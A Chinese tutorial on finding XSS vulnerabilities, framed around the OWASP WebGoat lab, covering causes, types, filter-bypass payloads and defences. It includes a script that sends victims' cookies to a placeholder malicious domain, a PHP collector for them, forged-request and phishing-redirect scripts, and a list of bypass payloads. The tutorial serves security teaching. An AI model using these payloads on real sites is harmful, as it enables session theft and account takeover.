news 2026/2/6 16:00:38

漏洞挖掘从入门到进阶(第三期):Web 实战 ——XSS 跨站脚本原理与绕过技巧

作者头像

张小明

前端开发工程师

1.2k 24
文章封面图
漏洞挖掘从入门到进阶(第三期):Web 实战 ——XSS 跨站脚本原理与绕过技巧

第3期:Web漏洞挖掘实战|XSS跨站脚本漏洞原理与绕过技巧

第一期的内容戳这里

第二期的内容戳这里

前言

XSS(Cross-Site Scripting,跨站脚本漏洞)是Web漏洞中最常见的漏洞之一,其危害虽不及SQL注入直接,但可用于窃取用户Cookie、伪造用户身份、发起钓鱼攻击等,在实战安全测试与CTF竞赛中频繁出现。与SQL注入的“数据库交互漏洞”不同,XSS是“页面渲染漏洞”,核心成因是“用户输入未被过滤,直接嵌入页面HTML中,导致恶意脚本被执行”。

本文将从底层渲染原理出发,拆解XSS的成因、分类、挖掘流程,结合OWASP WebGoat靶场实战,覆盖反射型、存储型XSS的挖掘与绕过技巧,同时补充前端/后端防护方案,兼顾理论与实操,适合Web安全新手、前端开发者、CTF爱好者阅读,需具备基础的HTML、JavaScript与HTTP协议知识。

一、XSS底层原理与核心成因

XSS的本质是“用户输入可控+页面未做过滤,导致恶意JavaScript脚本被浏览器执行”,其底层依赖浏览器的HTML渲染机制——浏览器会将页面中的HTML代码解析渲染,若用户输入的恶意脚本被当作合法HTML/JS代码解析,就会触发XSS。

  1. 漏洞代码示例(HTML+PHP)

    <!DOCTYPE html> <html> <body> <h1>搜索结果</h1> <?php // 接收用户输入的搜索关键词 $keyword = $_GET['keyword']; // 直接将用户输入嵌入页面(未做过滤) echo "你搜索的关键词是:" . $keyword; ?> </body> </html>
  2. XSS触发过程

当用户输入正常关键词(keyword=web安全)时,页面渲染后显示:“你搜索的关键词是:web安全”,无异常;当用户输入恶意脚本(keyword=< script>alert(‘XSS’)</ script>)时,页面渲染后的HTML代码为:

<!DOCTYPE html> <html> <body> <h1>搜索结果</h1> 你搜索的关键词是:<script>alert('XSS')</script> </body> </html>

浏览器解析到< script>标签后,会执行其中的alert(‘XSS’)语句,弹出弹窗,触发XSS漏洞。

  1. 核心成因总结

XSS的触发需满足两个核心条件,二者缺一不可:

补充说明:XSS的危害取决于恶意脚本的功能,简单的脚本仅能弹出弹窗,复杂的脚本可窃取用户Cookie(document.cookie)、伪造用户请求、跳转钓鱼页面等。

二、XSS的核心分类(按存储与触发方式)

根据恶意脚本的存储方式与触发场景,XSS可分为3类,不同类型的挖掘思路、危害范围差异较大,新手需重点掌握前两类。

  1. 反射型XSS(非持久化XSS)
  1. 存储型XSS(持久化XSS)
  1. DOM型XSS(文档对象模型XSS)

三、XSS标准化挖掘流程(靶场实战同步)

本文以OWASP WebGoat反射型XSS题目为例,拆解“信息收集→漏洞探测→漏洞验证→漏洞利用”的完整流程,新手可跟着实操;同时补充存储型XSS的挖掘要点。

  1. 信息收集(前置步骤)
  1. 漏洞探测(核心步骤)

漏洞探测的核心是“确认是否存在XSS注入点”,常用两种方式:手动探测与工具探测,优先手动探测(避免工具误报)。

(1)手动探测(反射型XSS)

(2)存储型XSS探测要点

存储型XSS的探测流程与反射型类似,核心差异是“需确认脚本是否被存储”:

(3)工具探测(Burp Suite+XSS插件)

对于批量探测或复杂场景,可使用Burp Suite辅助探测,搭配XSS插件(如XSS Validator):

  1. 漏洞利用(实战场景)

XSS的利用核心是“构造恶意脚本,实现具体攻击目标”,实战中常见的利用场景有3种:

(1)窃取用户Cookie

Cookie中通常包含用户登录凭证,窃取Cookie后可伪造用户身份登录,恶意脚本示例:

<script> // 将Cookie发送到恶意服务器 var img = new Image(); img.src = "http://恶意域名/steal.php?cookie=" + document.cookie; </script>

恶意服务器steal.php代码(接收并存储Cookie):

<?php $cookie = $_GET['cookie']; // 将Cookie写入文件 file_put_contents('cookie.txt', $cookie . "\n", FILE_APPEND); ?>

(2)伪造用户请求

通过XSS脚本伪造用户的POST/GET请求,执行恶意操作(如修改密码、发布恶意内容),示例(伪造评论提交请求):

<script> // 构造POST请求,伪造用户发布恶意评论 var xhr = new XMLHttpRequest(); xhr.open("POST", "http://目标域名/submit_comment.php", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("comment=恶意内容&user=当前用户"); </script>

(3)跳转钓鱼页面

通过XSS脚本将页面跳转到钓鱼页面,诱导用户输入账号密码,示例:

<script> // 延迟跳转,避免被用户察觉 setTimeout(function(){ document.location.href = "http://钓鱼域名/login.html"; }, 3000); </script>
  1. 漏洞验证与风险评估

四、常见过滤绕过技巧(实战必备)

实战中,开发者常会通过前端过滤、后端过滤两种方式防御XSS,新手需掌握以下5种常用绕过技巧,应对不同过滤场景。

  1. 标签与事件绕过(针对标签过滤)

若开发者过滤了< script>标签,可使用其他支持JS执行的HTML标签+事件属性绕过,常用组合如下:

# 图片标签+事件(最常用) <img src=x onerror=alert(1)> # onerror:图片加载失败时执行 <img src=1 onload=alert(1)> # onload:图片加载成功时执行 # 链接标签+事件 <a href=javascript:alert(1)>点击触发</a> # 点击链接执行 <a href=x onclick=alert(1)>点击触发</a> # 其他标签 <body onload=alert(1)> # 页面加载完成时执行 <svg onload=alert(1)> # SVG标签支持JS执行
  1. 大小写混淆绕过(针对大小写过滤)

若开发者仅过滤小写标签/事件,可通过大小写混淆绕过(浏览器解析HTML时不区分大小写):

<ScRiPt>alert(1)</ScRiPt> <img src=x OnErRoR=alert(1)>
  1. 编码绕过(针对特殊字符过滤)

若开发者过滤了<、>、"、'等特殊字符,可使用HTML实体编码、URL编码绕过,需根据渲染场景选择编码方式:

  1. 注释插入绕过(针对关键字过滤)

若开发者过滤了完整的关键字(如script、onerror),可在关键字中插入HTML注释,绕过过滤:

<sc<!--注释-->ript>alert(1)</sc<!--注释-->ript> <img src=x on<!--注释-->error=alert(1)>

原理:服务器过滤时会匹配完整关键字,插入注释后关键字被拆分,不会被过滤;浏览器解析时会忽略注释,拼接关键字并执行。

  1. DOM型XSS绕过技巧(针对后端过滤)

DOM型XSS漏洞在前端,后端过滤无效,可通过以下方式绕过前端过滤:

五、XSS防护方案(攻防兼备)

XSS防护需兼顾前端与后端,核心思路是“过滤输入、净化输出”,结合以下3种方案,可有效防御绝大多数XSS漏洞。

  1. 后端过滤与转义(核心防护)

后端过滤是最有效的防护方式,需对所有用户输入进行严格过滤或转义,推荐使用编程语言自带的转义函数:

  1. 前端过滤(辅助防护)

前端过滤可拦截简单的恶意脚本,提升用户体验,但不能作为核心防护(前端代码可被篡改):

  1. 其他防护措施

六、新手避坑指南(核心5点)

七、总结与下期预告

本文拆解了XSS跨站脚本漏洞的底层原理、核心分类、标准化挖掘流程与实战绕过技巧,结合OWASP WebGoat靶场完成实操,核心要点是“理解页面渲染机制,掌握输入过滤与输出净化的攻防逻辑”。XSS的挖掘核心不是背诵payload,而是根据过滤规则灵活构造脚本,同时兼顾防护方案,形成攻防兼备的能力。

网安学习资源

网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我们和网安大厂360共同研发的的网安视频教程,内容涵盖了入门必备的操作系统、计算机网络和编程语言等初级知识,而且包含了中级的各种渗透技术,并且还有后期的CTF对抗、区块链安全等高阶技术。总共200多节视频,100多本网安电子书,最新学习路线图和工具安装包都有,不用担心学不全。

🐵这些东西我都可以免费分享给大家,需要的可以点这里自取👉:网安入门到进阶资源

版权声明: 本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若内容造成侵权/违法违规/事实不符,请联系邮箱:809451989@qq.com进行投诉反馈,一经查实,立即删除!
网站建设 2026/2/4 11:53:15

看完就会:10个AI论文工具测评!MBA毕业论文写作+格式规范全攻略

在当前学术研究日益数字化的背景下&#xff0c;MBA学员在撰写毕业论文时面临诸多挑战&#xff1a;从选题构思到文献综述&#xff0c;从数据整理到格式规范&#xff0c;每一步都可能成为影响效率的关键节点。尤其在AI技术广泛应用的今天&#xff0c;如何选择一款真正能提升写作效…

作者头像 李华
网站建设 2026/2/4 11:52:14

冗余标准:企业如何构建接入、汇聚与交换系统全栈冗余体系

制定接入系统冗余标准、设计汇聚层冗余架构、统一交换系统冗余标准 摘要 为企业IT部门、信息化负责人及运维团队提供核心价值&#xff1a;通过标准化的全栈冗余体系建设&#xff0c;结合可视化运行监控系统&#xff0c;支撑ICT系统规划、标准化交付与平台化运维&#xff0c;实…

作者头像 李华
网站建设 2026/2/4 11:48:52

日志禁用提示原因与启用方法

在处理生产环境问题时&#xff0c;我们经常遇到“logging is disabled”这类提示。这通常意味着日志记录功能被意外或有意地关闭&#xff0c;导致关键的运行时信息、错误堆栈和调试线索丢失&#xff0c;使故障排查变得异常困难。理解其背后的原因并掌握重新启用日志的方法&…

作者头像 李华
网站建设 2026/2/6 16:50:59

探索快幕秀的奇妙世界:从签到墙到专业教程的全面体验分享

作为一名企业活动策划者&#xff0c;我经常需要寻找创新的方式来提升活动体验和宣传效果。最近&#xff0c;我接触到了"临时展快幕秀"服务&#xff0c;并在使用过程中积累了许多宝贵的经验。今天&#xff0c;我想通过这篇文章&#xff0c;与大家分享我的快幕秀之旅&a…

作者头像 李华
网站建设 2026/2/6 11:53:33

2026别错过!9个AI论文平台测评:专科生毕业论文+开题报告写作全攻略

随着2026年毕业季的临近&#xff0c;专科生们对论文写作的需求日益迫切。然而&#xff0c;面对选题困难、资料查找繁琐、格式规范不熟等问题&#xff0c;许多学生感到力不从心。为此&#xff0c;我们基于真实用户使用场景与最新技术发展&#xff0c;针对当前主流AI论文平台进行…

作者头像 李华